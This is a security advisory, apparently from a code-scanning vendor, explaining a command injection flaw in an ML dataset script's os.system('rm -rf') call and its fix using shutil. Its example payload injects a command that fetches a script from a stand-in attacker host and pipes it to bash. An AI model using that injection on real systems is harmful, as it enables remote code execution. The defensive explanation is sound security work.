How command injection happens in Python os.system() and how to fix it
Summary
A critical command injection vulnerability was found in the data/xView.yaml dataset download script used by a machine learning pipeline. The culprit: a single line — os.system(f'rm -rf {labels}') — that handed a user-influenced filesystem path directly to the shell. An attacker who controls the YAML configuration file could inject shell metacharacters into the labels path and achieve arbitrary command execution on the host machine. The fix is clean and decisive: throw out the shell call entirely and use Python's native filesystem APIs instead.
Introduction
The data/xView.yaml file defines how the xView aerial imagery dataset is downloaded and prepared for training. Buried inside its embedded Python download script, at line 102, was this line:
os.system(f'rm -rf {labels}')
The labels variable is a pathlib.Path object constructed from a base path that originates in the YAML configuration itself:
labels = Path(path / 'labels' / 'train')
Because path is derived from user-supplied or user-modifiable configuration, an attacker who can influence the YAML file can influence labels — and therefore influence the shell command that gets executed. This is the textbook definition of OS command injection (CWE-78), and it carries a critical severity rating because exploitation requires only the ability to supply a crafted dataset YAML file, which is a completely normal and expected operation when training on custom datasets.
The Vulnerability Explained
What went wrong
Python's os.system() passes its argument to the system shell (/bin/sh on Unix). When you use an f-string to build that argument, you're constructing a shell command string — and the shell will interpret every metacharacter in that string.
The vulnerable line:
os.system(f'rm -rf {labels}')
If labels evaluates to /path/to/project/labels/train, this becomes:
rm -rf /path/to/project/labels/train
Perfectly harmless. But suppose an attacker controls the base path so that the interpolated value looks something like:
/tmp/labels; curl http://attacker.com/shell.sh | bash
The resulting shell command becomes:
rm -rf /tmp/labels; curl http://attacker.com/shell.sh | bash
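The shell executes both commands. The ; metacharacter acts as a command separator, and the attacker's payload runs with the same privileges as the Python process. A real payload would also have to absorb the /labels/train suffix that the script appends to the base path, for example by ending in a # comment.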
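The effect is easy to reproduce without deleting anything. The following is a minimal sketch rather than the original script: a harmless echo stands in for rm -rf, subprocess.run(..., shell=True) is used only so the output can be captured, and the helper name run_through_shell and the example paths are assumptions made for illustration.

```python
import subprocess


def run_through_shell(labels: str) -> str:
    """Build a shell command with an f-string, as the vulnerable line did.

    A harmless `echo` stands in for `rm -rf` so nothing is deleted.
    """
    result = subprocess.run(
        f"echo removing {labels}",
        shell=True,  # like os.system(), the whole string is handed to the shell
        capture_output=True,
        text=True,
    )
    return result.stdout


benign = run_through_shell("/tmp/labels/train")
malicious = run_through_shell("/tmp/labels; echo INJECTED")

print(benign)     # output of the single intended command
print(malicious)  # output of the intended command AND the injected one
```

The second call produces an extra line of output because the shell treated everything after the ; as a separate command.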
Realistic attack scenarios
Scenario 1 — Malicious dataset distribution:
An attacker publishes a modified xView.yaml (or a custom dataset YAML that follows the same pattern) on a public repository or model hub. A researcher downloads it and runs the training pipeline. The download script executes, and the injected command runs silently alongside the legitimate rm -rf.
Scenario 2 — Supply chain attack:
In a CI/CD pipeline that automatically fetches dataset configurations, a compromised upstream YAML file triggers command execution on the build server, potentially exfiltrating secrets or installing backdoors.
Scenario 3 — Local privilege escalation:
In a shared compute environment (e.g., a university GPU cluster), a user places a crafted YAML in a shared directory. Another user with higher privileges runs training, and the injected command executes under their account.
Why f-strings make this worse
An f-string gives the appearance of clean, readable code — there's no obvious string concatenation that might trigger a code reviewer's instinct. But f'rm -rf {labels}' is functionally identical to 'rm -rf ' + str(labels) from the shell's perspective. Both produce a single string that the shell will parse and execute in full, metacharacters and all.
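A short check makes the equivalence concrete. This is an illustrative sketch: the base path is a hypothetical attacker-influenced value, and PurePosixPath stands in for Path only so the string form is the same on any operating system.

```python
from pathlib import PurePosixPath

# Hypothetical attacker-influenced base path. The trailing " #" turns the
# suffix that the script appends into a shell comment.
path = PurePosixPath("/tmp/data; echo INJECTED #")
labels = path / "labels" / "train"

via_fstring = f"rm -rf {labels}"
via_concat = "rm -rf " + str(labels)

# Both spellings produce exactly the same string for the shell to parse.
print(via_fstring == via_concat)
print(via_fstring)
```

Neither form is printed through a shell here; the point is only that the f-string offers no escaping or argument separation that concatenation lacks.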
The Fix
The fix is elegant because it doesn't try to sanitize the input — it eliminates the shell entirely.
Before (vulnerable)
import os
from pathlib import Path
# ...
labels = Path(path / 'labels' / 'train')
os.system(f'rm -rf {labels}')
labels.mkdir(parents=True, exist_ok=True)
After (fixed)
import shutil
from pathlib import Path
# ...
labels = Path(path / 'labels' / 'train')
if labels.is_symlink() or labels.is_file():
    labels.unlink()
else:
    shutil.rmtree(labels, ignore_errors=True)
labels.mkdir(parents=True, exist_ok=True)
Why this fix works
1. No shell is ever invoked.
shutil.rmtree() and Path.unlink() are standard-library functions that call the operating system's file-removal routines directly. There is no shell process, no shell parsing, and therefore no opportunity for shell metacharacter injection. It doesn't matter what characters are in labels: they're treated as a literal filesystem path, not as a shell command string.
2. The import os is replaced with import shutil.
This is a meaningful signal: the fix doesn't just patch the dangerous call, it removes the import that enabled it. As long as nothing else in the script imports os, os.system() is no longer reachable from this script's namespace.
3. Symlink and file edge cases are handled explicitly.
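The fix distinguishes between symlinks/files (labels.unlink()) and directories (shutil.rmtree()). The original rm -rf handled both implicitly. The explicit branch is needed in Python because shutil.rmtree() only removes real directories: it refuses to operate on a symlink and fails on a plain file, and with ignore_errors=True either failure would pass silently and leave the path in place.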
4. ignore_errors=True preserves the original intent.
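The original rm -rf silently succeeds even if the path doesn't exist, and shutil.rmtree(labels, ignore_errors=True) matches that behavior. Note that ignore_errors=True is broader than rm -f: it suppresses every removal error, including permission failures that rm would still report, so a failed cleanup can go unnoticed.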
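The points above can be exercised end to end in a throwaway directory. The sketch below wraps the fixed logic in a helper named reset_dir (a hypothetical name, not part of the original script) and feeds it a base path full of shell metacharacters; the directory and file names are assumptions chosen for the demonstration.

```python
import shutil
import tempfile
from pathlib import Path


def reset_dir(target: Path) -> None:
    """Remove whatever is at `target`, then recreate it as an empty directory."""
    if target.is_symlink() or target.is_file():
        target.unlink()
    else:
        shutil.rmtree(target, ignore_errors=True)
    target.mkdir(parents=True, exist_ok=True)


with tempfile.TemporaryDirectory() as tmp:
    # To the filesystem APIs, this is just an oddly named directory.
    base = Path(tmp) / "data; touch INJECTED"
    labels = base / "labels" / "train"
    labels.mkdir(parents=True)
    (labels / "stale.txt").write_text("old label")

    reset_dir(labels)

    remaining = sorted(p.name for p in labels.iterdir())
    is_directory = labels.is_dir()
    injected_file_created = (Path(tmp) / "INJECTED").exists()

print(remaining, is_directory, injected_file_created)
```

The stale file is gone, the directory exists again, and no file named INJECTED appears, because the string "touch INJECTED" was never interpreted as a command.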
Prevention & Best Practices
Never use os.system() with dynamic input
os.system() should be treated as a code smell in modern Python. It offers no argument separation, no output capture, and no protection against injection. The Python docs themselves recommend subprocess as a replacement — but even subprocess is dangerous with shell=True.
| Pattern | Safe? | Notes |
|---|---|---|
| os.system(f'rm -rf {path}') | ❌ | Shell injection, no output capture |
| subprocess.run(f'rm -rf {path}', shell=True) | ❌ | Same shell injection risk |
| subprocess.run(['rm', '-rf', str(path)]) | ✅ | No shell, args passed directly |
| shutil.rmtree(path) | ✅ | Best: no subprocess at all |
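To see why the list form in the table is safe from shell injection, it helps to look at what the child process actually receives. In this sketch a small Python child process stands in for rm and simply prints its arguments; the hostile value is a made-up example.

```python
import subprocess
import sys

# Hypothetical hostile value that would split into two commands in a shell.
hostile = "/tmp/labels; echo INJECTED"

# With a list and no shell=True, each element becomes exactly one argument.
# The child below only prints the arguments it was given.
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1:])", hostile],
    capture_output=True,
    text=True,
    check=True,
)

print(result.stdout)
```

The child sees a single argument containing the ; verbatim. When the command is rm itself, placing -- before the path (['rm', '-rf', '--', str(path)]) additionally keeps a path that begins with - from being read as an option.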
Prefer native Python filesystem APIs
For filesystem operations, Python's standard library almost always has a safe equivalent:
import shutil
from pathlib import Path

# Instead of: os.system('rm -rf /some/path')
shutil.rmtree('/some/path', ignore_errors=True)
# Instead of: os.system('cp src dst')
shutil.copy2(src, dst)
# Instead of: os.system('mkdir -p /some/path')
Path('/some/path').mkdir(parents=True, exist_ok=True)
# Instead of: os.system('mv src dst')
shutil.move(src, dst)  # unlike Path.rename(), also works across filesystems
Use shlex.quote() as a last resort
If you absolutely must pass a path to a shell command, use shlex.quote() to escape it:
import shlex
import subprocess
# If you truly cannot avoid a shell call:
safe_path = shlex.quote(str(labels))
subprocess.run(f'some-tool --input {safe_path}', shell=True, check=True)
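shlex.quote() returns a version of the string that is safe to use as a single shell token: it wraps the string in single quotes and escapes any internal single quotes, preventing shell interpretation. It is designed for POSIX shells only. This should remain a last resort; the preferred solution is always to avoid the shell entirely.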
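A quick demonstration of the quoting, again with a harmless echo in place of a real tool. The hostile value is an invented example, and the sketch assumes a POSIX shell.

```python
import shlex
import subprocess

# Hypothetical hostile value containing a command separator.
hostile = "/tmp/labels; echo INJECTED"
quoted = shlex.quote(hostile)

# The quoted value reaches echo as one argument instead of two commands.
result = subprocess.run(
    f"echo removing {quoted}",
    shell=True,
    capture_output=True,
    text=True,
)

print(quoted)
print(result.stdout)
```

The ; survives as ordinary text in the output, which shows the shell no longer treated it as a separator.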
Audit YAML-embedded scripts
Dataset configuration files that embed executable Python scripts (a pattern used by several ML frameworks) deserve special security scrutiny. Any path, URL, or string value that flows from YAML configuration into a shell command is a potential injection point. When reviewing such files, trace every variable that touches os.system(), subprocess, or eval().
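Part of that review can be automated. The following is a rough sketch of a first-pass scanner built on Python's ast module, assuming the embedded script has already been extracted from the YAML into a string. The function names, the list of risky calls, and the sample script are all illustrative assumptions, and the scanner only finds call sites; it does not trace data flow.

```python
import ast

# Call names treated as risky in this sketch; extend as needed.
RISKY_CALLS = {"os.system", "os.popen", "eval", "exec"}


def dotted_name(node: ast.AST) -> str:
    """Return a dotted name such as 'os.system' for simple call targets."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """List (line, call name) pairs for shell-invoking or eval-style calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        uses_shell = any(
            kw.arg == "shell"
            and isinstance(kw.value, ast.Constant)
            and kw.value.value is True
            for kw in node.keywords
        )
        if name in RISKY_CALLS or (name.startswith("subprocess.") and uses_shell):
            findings.append((node.lineno, name))
    return sorted(findings)


# Hypothetical script body; it is parsed, never executed.
sample = '''
import os, subprocess, shutil
os.system(f"rm -rf {labels}")
subprocess.run(["rm", "-rf", "--", str(labels)])
subprocess.run(f"ls {labels}", shell=True)
shutil.rmtree(labels, ignore_errors=True)
'''

findings = find_risky_calls(sample)
print(findings)
```

Each finding is a starting point for manual tracing: the reviewer still has to decide whether any configuration-derived value reaches the flagged call.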
Relevant standards
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- OWASP A03:2021: Injection — command injection is explicitly covered
- OWASP OS Command Injection Defense Cheat Sheet: recommends avoiding shell calls and using language-native APIs
Key Takeaways
- os.system() with an f-string is dangerous whenever the interpolated value is user-influenced. In this case, the labels path in xView.yaml was derived directly from YAML configuration that any user can modify.
- The path value from the YAML configuration was the taint source. It flowed through the labels variable into os.system() without any sanitization or quoting.
- Replacing os.system() with shutil.rmtree() is not just a patch. It is a structural fix that makes shell injection impossible by design, regardless of what the path contains.
- YAML files that embed executable scripts are an underappreciated attack surface in ML pipelines; every dynamic value that reaches a shell call must be treated as potentially attacker-controlled.
- shutil.rmtree() with ignore_errors=True, combined with Path.unlink() for symlinks and plain files, replaces rm -rf for this use case with zero shell involvement.
How Orbis AppSec Detected This
- Source: The path variable derived from YAML dataset configuration in data/xView.yaml, which flows into labels = Path(path / 'labels' / 'train')
- Sink: os.system(f'rm -rf {labels}') at data/xView.yaml:102, a shell-invoking function receiving an f-string built from the tainted labels variable
- Missing control: No shell escaping (e.g., shlex.quote()), no input validation, and no use of shell-free filesystem APIs before the value reached os.system()
- CWE: CWE-78, Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- Fix: Replaced os.system(f'rm -rf {labels}') with shutil.rmtree(labels, ignore_errors=True) and labels.unlink(), removing the shell invocation entirely
Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.
Conclusion
A single line — os.system(f'rm -rf {labels}') — was enough to introduce a critical command injection vulnerability into an ML dataset pipeline. The root cause isn't exotic: it's the combination of a shell-invoking function and an f-string built from user-influenced data, a pattern that appears frequently in data science and ML codebases where shell commands are used as quick shortcuts for filesystem operations.
The fix demonstrates the right mental model: when you need to delete a directory in Python, reach for shutil.rmtree(), not os.system('rm -rf ...'). The Python standard library has safe, shell-free equivalents for virtually every common filesystem operation. Using them doesn't just fix a vulnerability — it makes the entire class of shell injection attacks structurally impossible in that code path.
If you maintain ML pipelines that use YAML-embedded download scripts, this is a good moment to audit every call to os.system(), subprocess.run(..., shell=True), and eval() and ask: does any user-controlled value reach this call? If the answer is yes, the shell needs to go.